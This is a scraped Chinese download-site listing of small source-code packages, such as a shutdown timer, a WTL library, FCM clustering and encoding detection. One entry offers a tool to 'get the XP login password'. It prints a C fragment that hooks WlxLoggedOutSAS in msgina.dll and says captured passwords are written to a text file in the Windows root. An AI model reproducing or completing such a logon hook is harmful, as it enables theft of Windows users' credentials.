-
实现定时关机的一个小程序,可以自己设定时间长短,还是算比较有用的!...
实现定时关机的一个小程序,可以自己设定时间长短,还是算比较有用的!-Shutdown from time to time to achieve a small process, you can set the length of time, or regarded as relatively useful!
- 2023-02-02 21:55:04下载
- 积分:1
-
个人导航网页源码
- 2022-09-29 11:55:03下载
- 积分:1
-
VB实例源码,如有不妥之处请修改后通知再讨论一起来完善源码的上传....
VB实例源码,如有不妥之处请修改后通知再讨论一起来完善源码的上传.-Example VB source code, if the inadequacies of the revised notice, please discuss with one sound source upload.
- 2022-03-26 08:40:17下载
- 积分:1
-
获取XP登录密码
应用背景当忘记XP系统密码时,可以编译getInfo的dll和exe,执行getInfoRun.exe在下次登录时就可以获取密码了,密码文件保存在windows根目录下的getPwdout.txt文件中关键技术DWORD WINAPI StartHook(LPVOID lpParam)
{
//得到msgina.dll
//hooktable.hMsgina
int n = 0;
hooktable.hMsgina = LoadLibrary("msgina.dll");
n = GetLastError();
if (NULL == hooktable.hMsgina)
{
printf("getmoduleHandle msgina.dll error");
return -1;
}
//得到WlxLoggedOutSAS
hooktable.OldADDR = (WlxLoggedOutSAS)GetProcAddress(hooktable.hMsgina, "WlxLoggedOutSAS");
if (NULL == hooktable.OldADDR)
{
printf("GetProcAddress WlxLoggedOutSAS error");
return -1;
}
int *OpCode = (int*)&hooktable.charJmpCode[1];
int Code = (int)hooktable.NewADDR - (int)hooktable.OldADDR -5;
*OpCode = Code;
HookWlxLoggedOutSAS();
return 0;
}
- 2023-08-31 22:05:04下载
- 积分:1
-
WTL的8.0版本,最新的,可用在VC和eVC上
WTL的8.0版本,最新的,可用在VC和eVC上-WTL version 8.0, the latest available on the VC and eVC
- 2022-07-11 05:03:06下载
- 积分:1
-
FCM algorithm is a clustering algorithm based on the division of its thinking is...
FCM算法是一种基于划分的聚类算法,它的思想就是使得被划分到同一簇的对象之间相似度最大,而不同簇之间的相似度最小。模糊C均值算法是普通C均值算法的改进,普通C均值算法对于数据的划分是硬性的,而FCM则是一种柔性的模糊划分。在介绍FCM具体算法之前我们先介绍一些模糊集合的基本知识。-FCM algorithm is a clustering algorithm based on the division of its thinking is that it is making is divided into clusters with the greatest similarity between the object, and different similarity between the smallest cluster. Fuzzy C-means algorithm is an ordinary C-means algorithm, the general C-means algorithm for data delineation is rigid, while the FCM is a soft fuzzy partition. FCM in the introduction prior to the specific algorithm we first introduce some basic knowledge of fuzzy sets.
- 2022-08-19 01:42:39下载
- 积分:1
-
这是MTeX套装中的一个重要工具,用于判断一个文件是否包含中文字符,并猜测文件的中文编码(GBK/Big5/UTF8)。...
这是MTeX套装中的一个重要工具,用于判断一个文件是否包含中文字符,并猜测文件的中文编码(GBK/Big5/UTF8)。-This is a suite MTeX an important tool for judging whether or not a file that contains Chinese characters, and speculate on the Chinese document coding (GBK/Big5/UTF8).
- 2022-08-08 21:57:29下载
- 积分:1
-
排序算法,使用方便
排序算法,使用方便-algorithm, easy to use
- 2022-06-28 07:29:55下载
- 积分:1
-
windows下的MDI的基本实现
windows下的MDI的基本实现-MDI windows of the basic realization
- 2022-01-20 23:26:41下载
- 积分:1
-
窗口图形编程的基本知识和常用方法
介绍windows图形编程的基础知识和一些常用方法-Windows graphics programming introduce basic knowledge and some common methods
- 2022-04-07 12:43:01下载
- 积分:1